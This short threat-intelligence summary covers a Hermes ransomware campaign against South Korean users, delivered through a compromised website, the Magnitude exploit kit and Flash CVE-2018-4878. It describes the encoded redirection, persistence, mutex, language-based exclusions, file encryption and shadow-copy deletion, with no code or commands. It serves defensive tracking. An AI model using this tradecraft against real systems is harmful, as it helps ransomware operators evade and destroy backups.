Malwarebytes observed Hermes ransomware being delivered to South Korean users through a compromised Korean website and the Magnitude exploit kit using the Flash zero-day CVE-2018-4878. The infection chain used malicious redirection hidden in page source code with Base64 and RC4 encoding, then deployed Hermes 2.1 as the payload. Hermes copied itself into temporary locations, used Startup-folder persistence through a batch script, created the mutex "tech," skipped systems using Russian, Belarusian, or Ukrainian language settings, and encrypted local and network-accessible files. The ransomware generated per-victim RSA material, appended a HERMES marker and encrypted session-key blob to files, dropped ransom material under C:\Users\Public, and aggressively deleted shadow copies and backup files. The targeting of South Korean users and prior reporting around Hermes make the campaign relevant to DPRK-focused tracking, while the excerpt does not provide enough evidence to assert attribution beyond the source's cautious references.